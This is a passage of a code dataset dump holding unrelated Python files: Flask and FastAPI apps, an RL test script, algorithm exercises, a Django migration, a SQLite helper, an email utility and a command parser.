= 1001 # 用户不存在\nuserHasBeenExits = 1002 # 用户已存在\nuserOrPasswordError = 1003 # 用户名或密码错误\nserverBusy = 1004 # 服务器繁忙\n"},"size":{"kind":"number","value":154,"string":"154"}}},{"rowIdx":128460,"cells":{"max_stars_repo_path":{"kind":"string","value":"app.py"},"max_stars_repo_name":{"kind":"string","value":"llxp/AgeOfRandomBackend"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2171479"},"content":{"kind":"string","value":"import os\nfrom flask import Flask, send_from_directory\nfrom flask_cors import CORS\nfrom aor_parser import \\\n AORTechParser, AORCardParser, \\\n AORStringsParser, HomecityParser\n\napp = Flask(__name__, static_url_path='')\ncors = CORS(app)\n\ncurrent_path = os.getcwd()\n\ntech_parser = AORTechParser(\n current_path + '\\\\data\\\\Data\\\\techtreey.xml')\nstrings_parser = AORStringsParser(\n current_path + '\\\\data\\\\Data\\\\strings')\nhomecity_parser = HomecityParser(current_path + '\\\\data\\\\Data', current_path + '\\\\data\\\\Data\\\\civs.xml')\nparser = AORCardParser(\n current_path + '\\\\data\\\\Data',\n tech_parser,\n strings_parser,\n homecity_parser\n)\n\n\n@app.route(\n '/api/get_cards',\n methods=['GET'])\ndef index():\n return parser.cards\n\n\n@app.route('/img/')\ndef send_js(path):\n return send_from_directory('data/pictures/Data/wpfg', path)\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0', port=5005)\n"},"size":{"kind":"number","value":950,"string":"950"}}},{"rowIdx":128461,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/deprecated/test_rl.py"},"max_stars_repo_name":{"kind":"string","value":"floraxue/active-rl"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2171177"},"content":{"kind":"string","value":"import torch\nimport torch.optim as optim\n\nfrom itertools import count\nimport argparse\nfrom os.path import join\n\nfrom agent import NSQ\nfrom policy import PolicyNet\nfrom game import VFGGAME\nfrom explorer import Explorer\nfrom util import logger\nfrom train_new import MACHINE_LABEL_DIR_HOLDOUT, CLASSIFIER_ROOT_HOLDOUT\nfrom train_new import test_all\nfrom deprecated.lsun import test_lsun_model_holdout, train_lsun_model_holdout\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(description=\"training N-step Q learning\")\n parser.add_argument('--category', type=str, default='cat',\n help='image category')\n parser.add_argument('--budget', type=int, default=10000,\n help='maximum number of examples for human annotation')\n parser.add_argument('--eps-start', type=float, default=0.9,\n help='starting epsilon')\n parser.add_argument('--eps-end', type=float, default=0.05,\n help='ending epsilon')\n parser.add_argument('--decay-steps', type=int, default=100000,\n help='decay steps')\n parser.add_argument('--gamma', type=float, default=0.999,\n help='discount factor')\n parser.add_argument('--duration', '-N', type=int, default=100,\n help='get reward every N steps')\n parser.add_argument('--batch-size', type=int, default=128,\n help='batch size')\n parser.add_argument('--target-update', '-T', type=int, default=1000,\n help='update target network every T steps')\n parser.add_argument('--learning-start', type=int, default=50000)\n parser.add_argument('--buffer-size', type=int, default=100000)\n parser.add_argument('--num-actions', type=int, default=2,\n help='default action is `keep` or `drop`')\n parser.add_argument('--input_dim', type=int, default=2048,\n help='feature size')\n parser.add_argument('--save-every', type=int, default=1,\n help='save the checkpoint every K episode')\n parser.add_argument('--val_rate', type=float, default=0.2)\n parser.add_argument('--test_rate', type=float, default=0.2)\n # flags for the game\n parser.add_argument('--eval-dir', type=str, default='',\n help='path to the training list folder')\n parser.add_argument('--train-prefix', type=str, default='train',\n help='prefix of the training files')\n parser.add_argument('--key-path', type=str,\n help='key path for the unknown data set')\n parser.add_argument('--work-dir', type=str, default='', help = 'work dir')\n parser.add_argument('--pretrained', type=str, default='', help='path to pretrained NSQ policy')\n\n args = parser.parse_args()\n global work_dir\n work_dir = args.work_dirs\n return args\n\n\ndef test_nsq(args, game, q_func):\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n input_dim = args.input_dim\n num_actions = args.num_actions\n\n Q = q_func(input_dim, num_actions).to(device)\n target_Q = q_func(input_dim, num_actions).to(device)\n\n optimizer = optim.RMSprop(Q.parameters())\n\n expr = Explorer(args.eps_start, args.eps_end, decay_steps=args.decay_steps)\n\n robot = NSQ(Q, target_Q, optimizer, expr,\n gamma=args.gamma, num_actions=num_actions)\n\n episode_durations = []\n\n # Pipeline params\n category = args.category\n # Set initial unsure key path\n new_key_path = join(MACHINE_LABEL_DIR_HOLDOUT, '{}_trial_{}_unsure.p'.format(category, 0))\n\n # Test on RL agent\n logger.info('Testing on RL agent')\n for i_episode in range(1, args.episodes + 1):\n game.reset(new_key_path)\n\n # pipeline param\n trial = i_episode\n\n robot.q_function.reset_hidden(args.batch_size)\n robot.target_q_function.reset_hidden(args.batch_size)\n\n # sample the initial feature from the environment\n # since our policy network takes the hidden state and the current\n # feature as input. The hidden state is passed implicitly\n state = game.sample()\n for t in count():\n action, qvalue = robot.act(state)\n reward, next_state, done = game.step(action)\n\n if action > 0 and (game.chosen % game.duration == 0\n or game.chosen == game.budget):\n # Train the classifier\n game.train_model('latest_RL', CLASSIFIER_ROOT_HOLDOUT)\n # select threshold\n game.test_model('latest_RL', CLASSIFIER_ROOT_HOLDOUT)\n\n state = next_state\n\n if done:\n episode_durations.append(t + 1)\n # propagate through the whole dataset and split\n test_all_data_holdout(category, i_episode, \"RL\")\n new_key_path = join(MACHINE_LABEL_DIR_HOLDOUT, 'RL', '{}_trial_{}_unsure.p'.format(category, trial))\n break\n\n # Test on LSUN\n logger.info(\"Testing on LSUN\")\n for i_episode in range(1, args.episodes + 1):\n trial = i_episode\n new_key_path = join(MACHINE_LABEL_DIR_HOLDOUT, 'latest_LSUN',\n '{}_trial_{}_unsure.p'.format('cat', trial - 1))\n train_lsun_model_holdout(game, \"latest_LSUN\", CLASSIFIER_ROOT_HOLDOUT, new_key_path)\n test_lsun_model_holdout(\"latest_LSUN\", CLASSIFIER_ROOT_HOLDOUT)\n\n test_all_data_holdout(category, i_episode, \"LSUN\")\n\n\ndef test_all_data_holdout(category, i_episode, mode):\n \"\"\"\n test to split the dataset\n :return:\n \"\"\"\n trial = i_episode\n model_file_dir = join(CLASSIFIER_ROOT_HOLDOUT, 'latest_{}'.format(mode), 'snapshots')\n last_trial_key_path = join(MACHINE_LABEL_DIR_HOLDOUT, mode,\n '{}_trial_{}_unsure.p'.format(category, trial - 1))\n\n test_all(last_trial_key_path, trial, 'resnet', 'cat', model_file_dir)\n\ndef main():\n args = parse_arguments()\n game = VFGGAME(args)\n q_func = PolicyNet\n test_nsq(args, game, q_func)\n\n\nif __name__ == '__main__':\n main()\n"},"size":{"kind":"number","value":6108,"string":"6,108"}}},{"rowIdx":128462,"cells":{"max_stars_repo_path":{"kind":"string","value":"Task03/FindWordOccurence.py"},"max_stars_repo_name":{"kind":"string","value":"apilatau/pythonSandBox"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2171642"},"content":{"kind":"string","value":"import re\n\ntext = [\n \"Hello, World!\",\n \"The world is mine\",\n \"Hello, how are you?\"\n]\n \n \ndef get_words(text):\n words = []\n for sentence in text:\n words_in_sentence = re.findall(r'\\w+', sentence.lower())\n for item in words_in_sentence:\n words.append(item)\n \n return words\n \n \ndef get_words_dict(words):\n words_dict = dict()\n \n for word in words:\n if word in words_dict:\n words_dict[word] = words_dict[word] + 1\n else:\n words_dict[word] = 1\n return words_dict\n\n\ndef get_index_text(word):\n for sentence in text:\n sentence_words = re.split(r'\\W+', sentence.lower()) \n if word in sentence_words:\n return text.index(sentence)\n \n \ndef main():\n \n words = get_words(text)\n words_dict = get_words_dict(words)\n \n print(f\"{'word':10}{'count':<10}{'occurrence':>10}\")\n for word in words_dict:\n index_occerence = get_index_text(word)\n print(f\"{word:<10}{words_dict[word]:<10}{index_occerence:<10}\")\n\nmain()"},"size":{"kind":"number","value":1075,"string":"1,075"}}},{"rowIdx":128463,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/iam_sarif_report/bootstrap.py"},"max_stars_repo_name":{"kind":"string","value":"georgealton/iam-policy-validator-to-sarif"},"max_stars_count":{"kind":"number","value":3,"string":"3"},"id":{"kind":"string","value":"2170167"},"content":{"kind":"string","value":"from __future__ import annotations\n\nimport punq\n\nfrom .adapters import checks, reader, reporter, validator\nfrom .domain import converter\nfrom .service_layer import bus, handlers\n\n\ndef bootstrap() -> bus.Bus:\n container = punq.Container()\n\n container.register(\"Reader\", reader.LocalFileReader)\n container.register(\"ChecksRepository\", checks.ChecksPackageDataRepository)\n container.register(\"Reporter\", reporter.CLIReporter)\n container.register(\"Converter\", converter.SarifConverter)\n container.register(\"Validator\", validator.AWSAccessAnalyzerValidator)\n\n return bus.Bus(\n command_handlers={\n Command: container.instantiate(Handler)\n for Command, Handler in handlers.Handler.registry.items()\n }\n )\n"},"size":{"kind":"number","value":757,"string":"757"}}},{"rowIdx":128464,"cells":{"max_stars_repo_path":{"kind":"string","value":"09/xmas.py"},"max_stars_repo_name":{"kind":"string","value":"josiah-keller/aoc-2020"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2170779"},"content":{"kind":"string","value":"#!/usr/bin/env python3\n\"\"\"\nCrack the XMAS encoding.\n\nhttps://adventofcode.com/2020/day/9\n\"\"\"\n\nimport argparse\n\ndef fetch_preamble(file, n):\n \"\"\"\n Given a file, read the first n numbers. Sort the list for faster search.\n Return both the original list and the sorted list as a tuple.\n \"\"\"\n numbers = []\n while len(numbers) < n:\n numbers.append(fetch_next(file))\n return (numbers, sorted(numbers))\n\ndef fetch_next(file):\n return int(file.readline())\n\ndef update(ls, new_number):\n \"\"\"\n Given a tuple of original list and sorted list, add the new number to the\n lists and drop the oldest number. Return the updated tuple. (they are also\n updated by reference).\n \"\"\"\n (numbers, sorted_numbers) = ls\n drop = numbers[0]\n numbers = numbers[1:] + [new_number]\n sorted_numbers.remove(drop) # ok for there to be duplicates b/c we just remove the first one!\n sorted_numbers.append(new_number)\n sorted_numbers.sort() # would be more efficient to iterate once and insert/remove but who cares\n return (numbers, sorted_numbers)\n\ndef is_valid(ls, number):\n \"\"\"\n Given a tuple of original list and sorted list, determine whether the next\n number is valid (ie, is a sum of some pair in the list)\n \"\"\"\n (numbers, sorted_numbers) = ls\n for i in range(len(sorted_numbers) - 1, 0, -1):\n if sorted_numbers[i] > number:\n continue\n for j in range(0, i):\n if sorted_numbers[i] + sorted_numbers[j] == number:\n return True\n\n return False\n\ndef find_range(file, target):\n \"\"\"\n Given a file, read numbers to find a contiguous list of numbers that sums to\n the given target number. Return the list.\n \"\"\"\n numbers = []\n candidate = sum(numbers)\n while candidate != target:\n if candidate > target:\n numbers.pop(0)\n else:\n numbers.append(fetch_next(file))\n candidate = sum(numbers)\n\n return numbers\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('filename', help='Path to the file containing XMAS data')\n parser.add_argument('--tail-len', type=int, default=25, help='Length of preamble/previous N numbers to consider')\n args = parser.parse_args()\n\n with open(args.filename, 'r') as f:\n tail = fetch_preamble(f, args.tail_len)\n number = fetch_next(f)\n while(is_valid(tail, number)):\n tail = update(tail, number)\n number = fetch_next(f)\n target_number = number\n print('Invalid number (target):', target_number)\n\n f.seek(0)\n contig = find_range(f, target_number)\n print('Found range that sums to target number:', contig)\n xmas = min(contig) + max(contig)\n print('XMAS value:', xmas)"},"size":{"kind":"number","value":2624,"string":"2,624"}}},{"rowIdx":128465,"cells":{"max_stars_repo_path":{"kind":"string","value":"algorithm/about_merge_sort.py"},"max_stars_repo_name":{"kind":"string","value":"dictxwang/python-fragments"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2171028"},"content":{"kind":"string","value":"# -*- coding: utf8 -*-\n__author__ = 'wangqiang'\n\n'''\n归并排序:最坏时间复杂度 n*lgn 采用分而治之的方式\n'''\n\n\ndef merge_sort(lst):\n if len(lst) <= 1:\n return lst\n middle = len(lst) // 2\n # 分别递归排序左右两个子序列\n left = merge_sort(lst[:middle])\n right = merge_sort(lst[middle:])\n\n # 对已排序的子序列进行合并\n i = 0\n j = 0\n k = 0\n result = [0] * len(lst)\n while i < len(left) and j < len(right):\n if left[i] <= right[j]:\n result[k] = left[i]\n i += 1\n else:\n result[k] = right[j]\n j += 1\n k += 1\n\n # 将子序列多出的元素直接追加到结果序列中\n while i < len(left):\n result[k] = left[i]\n k += 1\n i += 1\n while j < len(right):\n result[k] = right[j]\n k += 1\n j += 1\n return result\n\n\nif __name__ == '__main__':\n lst = [23, 1, 4, 5, -10, 56, 190, 230, 20, 30, 40, 50]\n lst = merge_sort(lst)\n print(lst)\n"},"size":{"kind":"number","value":898,"string":"898"}}},{"rowIdx":128466,"cells":{"max_stars_repo_path":{"kind":"string","value":"sector/migrations/0004_auto_20180305_1429.py"},"max_stars_repo_name":{"kind":"string","value":"uktrade/invest"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2172550"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n# Generated by Django 1.11.10 on 2018-03-05 14:29\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\nimport wagtail.core.blocks\nimport wagtail.core.fields\nimport wagtailmarkdown.blocks\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sector', '0003_sectorpage_show_on_frontpage'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='sectorpage',\n name='pullout',\n field=wagtail.core.fields.StreamField((('content', wagtail.core.blocks.StructBlock((('text', wagtailmarkdown.blocks.MarkdownBlock()), ('stat', wagtail.core.blocks.CharBlock()), ('stat_text', wagtail.core.blocks.CharBlock())), max_num=1, min_num=0)),), blank=True),\n ),\n ]\n"},"size":{"kind":"number","value":768,"string":"768"}}},{"rowIdx":128467,"cells":{"max_stars_repo_path":{"kind":"string","value":"ui/maintenance_protocols/configure_make_install.py"},"max_stars_repo_name":{"kind":"string","value":"liyao001/BioQueue"},"max_stars_count":{"kind":"number","value":33,"string":"33"},"id":{"kind":"string","value":"2170491"},"content":{"kind":"string","value":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 29/12/2017 10:05 AM\n# @Project : main\n# @Author : \n# @File : configure_make_install.py\n\n\ndef get_sub_protocol(db_obj, protocol_parent, step_order_start=1):\n steps = list()\n steps.append(db_obj(software='./configure',\n parameter='--prefix {{UserBin}}',\n parent=protocol_parent,\n user_id=0,\n hash='dfca5277f71c6782e3351f6ed9ac7fcb',\n step_order=step_order_start))\n steps.append(db_obj(software='make',\n parameter='',\n parent=protocol_parent,\n user_id=0,\n hash='099dafc678df7d266c25f95ccf6cde22',\n step_order=step_order_start+1))\n steps.append(db_obj(software='make',\n parameter='install',\n parent=protocol_parent,\n user_id=0,\n hash='12b64827119f4815ca8d43608d228f36',\n step_order=step_order_start+2))\n return step_order_start+len(steps), steps"},"size":{"kind":"number","value":1170,"string":"1,170"}}},{"rowIdx":128468,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/api_segura/app/app.py"},"max_stars_repo_name":{"kind":"string","value":"PythonistaMX/py261"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2170175"},"content":{"kind":"string","value":"from typing import List\nfrom fastapi import FastAPI, Depends\nfrom fastapi.exceptions import HTTPException\nfrom sqlalchemy.orm import Session\nfrom app import crud\nfrom app import models\nfrom app import schemas\nfrom app.db import create_db_and_tables, get_db\nfrom app.users import auth_backend, current_active_user, fastapi_users\n\n\napp = FastAPI()\n\n@app.get(\"/api/\", response_model=List[schemas.SchemaAlumno])\ndef vuelca_base(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):\n alumnos = crud.consulta_alumnos(db, skip=skip, limit=limit)\n return alumnos\n\n@app.get(\"/api/{cuenta}\", response_model=schemas.SchemaAlumno)\ndef get_alumno(cuenta, db: Session = Depends(get_db)):\n alumno = crud.consulta_alumno(db=db, cuenta=cuenta)\n if alumno:\n return alumno\n else:\n raise HTTPException(status_code=404, detail=\"Recurso no encontrado\")\n\n \n@app.delete(\"/api/{cuenta}\")\nasync def delete_alumno(cuenta, user: models.UserDB = Depends(current_active_user), db: Session = Depends(get_db)):\n alumno = crud.consulta_alumno(db=db, cuenta=cuenta)\n if alumno:\n crud.baja_alumno(db=db, alumno=alumno)\n return {}\n else:\n raise HTTPException(status_code=404, detail=\"Recurso no encontrado\")\n\n \n@app.post(\"/api/{cuenta}\", response_model=schemas.SchemaAlumno)\ndef post_alumno(cuenta, candidato: schemas.SchemaAlumnoIn, db: Session = Depends(get_db)):\n alumno = crud.consulta_alumno(db=db, cuenta=cuenta)\n if alumno:\n raise HTTPException(status_code=409, detail=\"Recurso existente\")\n return crud.alta_alumno(db=db, cuenta=cuenta, candidato=candidato) \n\n \n@app.put(\"/api/{cuenta}\", response_model=schemas.SchemaAlumno)\ndef put_alumno(cuenta, candidato: schemas.SchemaAlumnoIn, db: Session = Depends(get_db)):\n alumno = crud.consulta_alumno(db=db, cuenta=cuenta)\n if alumno:\n crud.baja_alumno(db=db, alumno=alumno)\n return crud.alta_alumno(db=db, cuenta=cuenta, candidato=candidato)\n else:\n raise HTTPException(status_code=404, detail=\"Recurso no encontrado\")\n\nAUTH_PATH ='/auth'\n\napp.include_router(fastapi_users.get_auth_router(auth_backend), \nprefix=f\"{AUTH_PATH}/jwt\", \ntags=[\"auth\"])\napp.include_router(fastapi_users.get_register_router(), \nprefix=f\"{AUTH_PATH}\", \ntags=[\"auth\"])\napp.include_router(fastapi_users.get_reset_password_router(),\nprefix=f\"{AUTH_PATH}\",\ntags=[\"auth\"],)\napp.include_router(fastapi_users.get_verify_router(),\nprefix=f\"{AUTH_PATH}\",\ntags=[\"auth\"],)\napp.include_router(fastapi_users.get_users_router(), \nprefix=\"/users\", \ntags=[\"users\"])\n\n@app.on_event(\"startup\")\nasync def on_startup():\n # Not needed if you setup a migration system like Alembic\n await create_db_and_tables()"},"size":{"kind":"number","value":2730,"string":"2,730"}}},{"rowIdx":128469,"cells":{"max_stars_repo_path":{"kind":"string","value":"server-side/safeBase.py"},"max_stars_repo_name":{"kind":"string","value":"tomellericcardo/SafeChat"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2169181"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n\nfrom os.path import realpath, dirname, join\nfrom re import compile\nfrom sqlite3 import connect\n\n\nclass SafeBase:\n \n def __init__(self, g, database_filename):\n self.g = g\n posizione = dirname(realpath(__file__))\n self.percorso = join(posizione, database_filename)\n self.init_db()\n \n def init_db(self):\n database = connect(self.percorso)\n cursore = database.cursor()\n cursore.execute('''\n CREATE TABLE IF NOT EXISTS utente (\n username TEXT PRIMARY KEY,\n password TEXT NOT NULL,\n chiave TEXT NOT NULL,\n sale TEXT NOT NULL\n )\n ''')\n database.commit()\n cursore.execute('''\n CREATE TABLE IF NOT EXISTS profilo (\n username TEXT PRIMARY KEY,\n nome TEXT,\n cognome TEXT,\n stato TEXT,\n foto TEXT\n )\n ''')\n database.commit()\n cursore.execute('''\n CREATE TABLE IF NOT EXISTS messaggio (\n chiave INTEGER PRIMARY KEY AUTOINCREMENT,\n proprietario TEXT NOT NULL,\n partecipante TEXT NOT NULL,\n mittente TEXT NOT NULL,\n immagine INT DEFAULT 0,\n testo TEXT NOT NULL,\n data_ora DATETIME DEFAULT CURRENT_TIMESTAMP,\n letto INT DEFAULT 0\n )\n ''')\n database.commit()\n cursore.execute('''\n CREATE VIEW IF NOT EXISTS ultimo_messaggio AS\n SELECT m.proprietario, m.mittente, m.partecipante, m.testo, m.immagine, m.data_ora, m.letto\n FROM messaggio m\n INNER JOIN (\n SELECT proprietario, partecipante, MAX(data_ora) AS data_ora\n FROM messaggio\n GROUP BY proprietario, partecipante\n ) u\n ON u.proprietario = m.proprietario\n AND u.partecipante = m.partecipante\n AND u.data_ora = m.data_ora\n ''')\n database.commit()\n cursore.execute('''\n CREATE VIEW IF NOT EXISTS non_letti AS\n SELECT proprietario, partecipante,\n SUM(CASE letto WHEN 0 THEN 1 ELSE 0 END) AS non_letti\n FROM messaggio\n GROUP BY proprietario, partecipante\n ''')\n database.commit()\n cursore.close()\n database.close()\n \n def apri_connessione(self):\n self.g.db = connect(self.percorso)\n self.g.db.text_factory = str\n self.g.db.create_function('REGEXP', 2, self.regexp)\n \n def chiudi_connessione(self):\n db = getattr(self.g, 'db', None)\n if db is not None:\n db.close()\n \n def regexp(self, espressione, oggetto):\n reg = compile(espressione)\n return reg.search(oggetto) is not None\n \n def leggi_righe(self, query, parametri):\n cursore = self.g.db.cursor()\n cursore.execute(query, parametri)\n risultato = cursore.fetchall()\n cursore.close()\n return risultato\n \n def leggi_riga(self, query, parametri):\n cursore = self.g.db.cursor()\n cursore.execute(query, parametri)\n risultato = cursore.fetchone()\n cursore.close()\n return risultato\n \n def leggi_dato(self, query, parametri):\n return self.leggi_riga(query, parametri)[0]\n \n def scrivi(self, query, parametri):\n cursore = self.g.db.cursor()\n cursore.execute(query, parametri)\n self.g.db.commit()\n cursore.close()\n"},"size":{"kind":"number","value":3601,"string":"3,601"}}},{"rowIdx":128470,"cells":{"max_stars_repo_path":{"kind":"string","value":"test/test_pipeline_manager.py"},"max_stars_repo_name":{"kind":"string","value":"zuevval/topological-sorting"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2172200"},"content":{"kind":"string","value":"from pipeline_manager import pipeline\n\n\ndef test_pipeline_manager():\n add_step = pipeline()\n a = []\n\n @add_step\n def step1():\n a.append(1)\n\n @add_step(depends_on=[\"step1\"])\n def step2():\n a.append(2)\n\n @add_step(depends_on=[\"step1\", \"step2\"])\n def step3():\n a.append(3)\n\n @add_step(depends_on=[\"step1\", \"step2\", \"step3\"])\n def step4():\n a.append(4)\n\n step4()\n assert a == [1, 1, 2, 1, 1, 2, 3, 4]\n\n a = []\n step3()\n assert a == [1, 1, 2, 3]\n\n @add_step\n def step5():\n a.append(5)\n\n a = []\n step4()\n assert a == [1, 1, 2, 1, 1, 2, 3, 4]\n\n a = []\n step5()\n assert a == [5]\n"},"size":{"kind":"number","value":675,"string":"675"}}},{"rowIdx":128471,"cells":{"max_stars_repo_path":{"kind":"string","value":"app/lib/email_utils.py"},"max_stars_repo_name":{"kind":"string","value":"joelbcastillo/NYCOpenRecords"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2172498"},"content":{"kind":"string","value":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n app.lib.email_utils\n ~~~~~~~~~~~~~~~~\n\n Implements e-mail notifications for OpenRecords. Flask-mail is a dependency, and the following environment variables\n need to be set in order for this to work: (Currently using Fake SMTP for testing)\n MAIL_SERVER: 'localhost'\n MAIL_PORT: 2500\n MAIL_USE_TLS: FALSE\n MAIL_USERNAME: os.environ.get('MAIL_USERNAME')\n MAIL_PASSWORD: ('MAIL_PASSWORD')\n DEFAULT_MAIL_SENDER: 'Records Admin <>'\n\n\"\"\"\n\nfrom flask import current_app, render_template\nfrom flask_mail import Message\n\nfrom app import mail, celery, sentry\nfrom app.models import Requests\n\n@celery.task\ndef send_async_email(msg):\n try:\n mail.send(msg)\n except Exception as e:\n sentry.captureException()\n current_app.logger.exception(\"Failed to Send Email {} : {}\".format(msg, e))\n\n\ndef send_contact_email(subject, recipients, body, sender):\n msg = Message(subject, recipients, body, sender=sender)\n send_async_email.delay(msg)\n\n\ndef send_email(subject, to=list(), cc=list(), bcc=list(), template=None, email_content=None, **kwargs):\n \"\"\"\n Function that sends asynchronous emails for the application.\n Takes in arguments from the frontend.\n\n :param to: Person(s) email is being sent to\n :param cc: Person(s) being CC'ed on the email\n :param bcc: Person(s) being BCC'ed on the email\n :param subject: Subject of the email\n :param template: HTML and TXT template of the email content\n :param email_content: string of HTML email content that can be used as a message template\n :param kwargs: Additional arguments the function may take in (ie: Message content)\n \"\"\"\n assert to or cc or bcc\n msg = Message(current_app.config['MAIL_SUBJECT_PREFIX'] + ' ' + subject,\n sender=current_app.config['MAIL_SENDER'], recipients=to, cc=cc, bcc=bcc)\n # Renders email template from .txt file commented out and not currently used in development\n # msg.body = render_template(template + '.txt', **kwargs)\n if email_content:\n msg.html = email_content\n else:\n msg.html = render_template(template + '.html', **kwargs)\n\n attachment = kwargs.get('attachment', None)\n if attachment:\n filename = kwargs.get('filename')\n mimetype = kwargs.get('mimetype', 'application/pdf')\n msg.attach(filename, mimetype, attachment)\n send_async_email.delay(msg)\n\n\ndef get_agency_emails(request_id, admins_only=False):\n \"\"\"\n Gets a list of the agency emails (assigned users and default email)\n\n :param request_id: FOIL request ID to query UserRequests\n :param admins_only: return list of agency admin emails only\n :return: list of agency emails or [''] (for testing)\n \"\"\"\n request = Requests.query.filter_by(id=request_id).one()\n\n if admins_only:\n return list(set(user.notification_email if user.notification_email is not None else user.email for user in\n request.agency.administrators))\n\n return list(set([user.notification_email if user.notification_email is not None else user.email for user in\n request.agency_users] + [request.agency.default_email]))\n"},"size":{"kind":"number","value":3250,"string":"3,250"}}},{"rowIdx":128472,"cells":{"max_stars_repo_path":{"kind":"string","value":"topCoder/srms/100s/srm152/div2/league_picks.py"},"max_stars_repo_name":{"kind":"string","value":"ferhatelmas/algo"},"max_stars_count":{"kind":"number","value":25,"string":"25"},"id":{"kind":"string","value":"2172187"},"content":{"kind":"string","value":"class LeaguePicks:\n def returnPicks(self, position, friends, picks):\n ls, d, r, i = [], True, friends - position + 1, 0\n while (d and picks >= position) or (not d and picks >= r):\n ls.append(i + (position if d else r))\n i += friends\n picks -= friends\n d = not d\n return ls\n"},"size":{"kind":"number","value":341,"string":"341"}}},{"rowIdx":128473,"cells":{"max_stars_repo_path":{"kind":"string","value":"actioneer/performer.py"},"max_stars_repo_name":{"kind":"string","value":"Ayplow/Actioneer"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2172444"},"content":{"kind":"string","value":"from typing import List, Any, Dict, Callable, Tuple\nfrom .errors import NoClosingQuote, NoActionFound\nfrom .utils import get_ctxs, Flags, Options\nfrom .action import Action\nimport re\nimport traceback\nfrom inspect import isawaitable\n\n\nquoteRe = re.compile(r\"[\\\"']\")\nchunk = re.compile(r\"\\S+\")\n\nclass SourceStr(str):\n pass\n\nclass Performer:\n def __init__(self, ctx: Tuple[Any, ...] = (), *, loop=None):\n self.commands = {}\n self.lookup = {}\n self.ctx = ctx + (self,)\n self.loop = loop\n\n def register(self, cmd):\n self.commands[cmd.name] = cmd\n self.lookup[cmd.name] = cmd\n cmd.performer = self\n for alias in cmd.aliases:\n self.lookup[alias] = cmd\n return cmd\n\n def run(self, args, ctx: Tuple[Any] = ()):\n cmd_name = args.split(\" \")[0]\n cmd = self.lookup.get(cmd_name)\n try:\n if cmd:\n args = self.split_args(args)\n options, args = self.get_options(args, cmd.options,\n cmd.option_aliases)\n flags, args = self.get_flags(args, cmd.flags,\n cmd.flag_aliases)\n flags = Flags(flags)\n options = Options(options)\n if self.loop:\n coro = cmd.async_invoke(args[1:], ctx + self.ctx +\n (flags, options, SourceStr(args[args.index(\" \") +1:])))\n return self.loop.create_task(coro)\n else:\n return cmd.invoke(args[1:], ctx + self.ctx +\n (flags, options, SourceStr(args[args.index(\" \") +1:])))\n raise NoActionFound(\"No Action called {} found\".format(cmd_name))\n except Exception as e:\n if self.loop:\n if cmd and cmd.error_handler:\n self.loop.create_task(cmd.async_run_fail(e, ctx))\n else:\n self.loop.create_task(self.async_run_fail(e, ctx))\n else:\n if cmd and cmd.error_handler:\n cmd.run_fail(e, ctx)\n else:\n self.run_fail(e, ctx)\n\n def error(self, func):\n self.fail = func\n\n def fail(self, e):\n traceback.print_exception(type(e), e, e.__traceback__)\n\n def run_fail(self, e, ctx: Tuple[Any] = ()):\n ctxs = get_ctxs(self.fail, ctx)\n self.fail(e, **ctxs)\n\n async def async_run_fail(self, e, ctx: List[Any] = ()):\n ctxs = get_ctxs(self.fail, ctx)\n if isawaitable(self.fail):\n await self.fail(e, **ctxs)\n else:\n self.fail(e, **ctxs)\n\n def split_args(self, s: str) -> List[str]:\n \"\"\"Will split the raw input into the arguments\"\"\"\n args = []\n i = 0\n while i < len(s):\n char = s[i]\n if re.match(quoteRe, char):\n try:\n j = s.index(char, i+1)\n args.append(s[i + 1: j])\n i = j\n except ValueError:\n raise NoClosingQuote(\"Missing closing quote.\")\n else:\n match = chunk.match(s, i)\n if match:\n args.append(match.group())\n i = match.end()\n i += 1\n return args\n\n def get_options(self, inp: List[str], options: Dict[str, Callable],\n aliases: Dict[str, str]) -> Tuple[Dict[str, bool], List[str]]:\n \"\"\"Will get options, the return will be converted as setup\"\"\"\n options_out = {}\n for i, arg in enumerate(inp):\n name = arg[2:]\n if not arg.startswith(\"-\"):\n continue\n try:\n if arg.startswith(\"-\") and name in options.keys():\n options_out[name] = options[name](inp[i+1])\n del inp[i]\n del inp[i]\n elif arg.startswith(\"-\") and name in aliases.keys():\n options_out[aliases[name]] = options[name](inp[i+1])\n del inp[i]\n del inp[i]\n except Exception as e:\n raise e\n return options_out, inp\n\n def get_flags(self, inp: List[str], flags: List[str],\n aliases: Dict[str, str]) -> Tuple[Dict[str, bool], List[str]]:\n \"\"\"Will get all flags\"\"\"\n out = {name: False for name in flags}\n\n for i, arg in enumerate(inp):\n name = arg[1:]\n if arg.startswith(\"-\") and name in flags:\n out[name] = True\n del inp[i]\n elif arg.startswith(\"-\") and name in aliases.keys():\n out[aliases[name]] = True\n del inp[i]\n return out, 